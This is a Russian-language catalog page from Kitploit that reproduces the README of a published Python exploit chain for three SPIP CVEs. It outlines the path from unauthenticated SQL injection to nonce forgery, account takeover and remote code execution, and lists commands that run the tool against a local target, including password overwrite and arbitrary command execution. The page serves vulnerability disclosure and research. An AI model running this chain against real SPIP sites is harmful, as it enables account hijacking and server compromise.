Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
spip-exploits — Цепочка эксплойтов на Python для CVE SPIP 2026-72708/72709/72710, объединяющая неаутентифицированную SQL-инъекцию с захватом учётной записи и удалённым выполнением кода. | Kitploit
Инструменты/GitHubGitHub/ambionics/spip-exploits
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеСтатьи и Исследования
GitHubambionics/spip-exploits

spip-exploits

Цепочка эксплойтов на Python для CVE SPIP 2026-72708/72709/72710, объединяющая неаутентифицированную SQL-инъекцию с захватом учётной записи и удалённым выполнением кода.

Репозиторий
11 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

От неаутентифицированной SQL-инъекции до удалённого выполнения кода

Эксплойт для CVE-2026-72708, CVE-2026-72709 и CVE-2026-72710, обнаруженных Franck Chevalier (Wayko)

Полный технический разбор читайте в статье в блоге Lexfo.

Отказ от ответственности

Этот репозиторий предоставлен исключительно в целях исследований и защитной безопасности. Автор не несёт ответственности за неправомерное использование этой информации.


Обзор

Точка входа — SQL-инъекция на публичной странице sitemap.xml, позволяющая утечь alea_ephemere.

С этим секретом можно подделывать валидные nonce для анонимных действий.

Отсюда два действия ведут к RCE:

  • action=editer_auteur — захват учётной записи, затем RCE из приватной области.
  • action=editer_objet — mass assignment для записи строки в очередь spip_jobs, затем её выполнение через action=cron.

Эксплуатация

Настройка

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

Обнаружение

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

Полная цепочка 1 : Захват учётной записи (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

Перед перезаписью --ato выгружает login цели и текущий хеш pass (через SQLi), чтобы вы могли вернуть их обратно с помощью --restore-hash:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

Полная цепочка 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

Файл будет записан в IMG/casse-spip_<token>.html.


Ссылки

  • Запись в блоге — технический разбор
  • Vulncheck — детали уязвимости
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
Скачать инструмент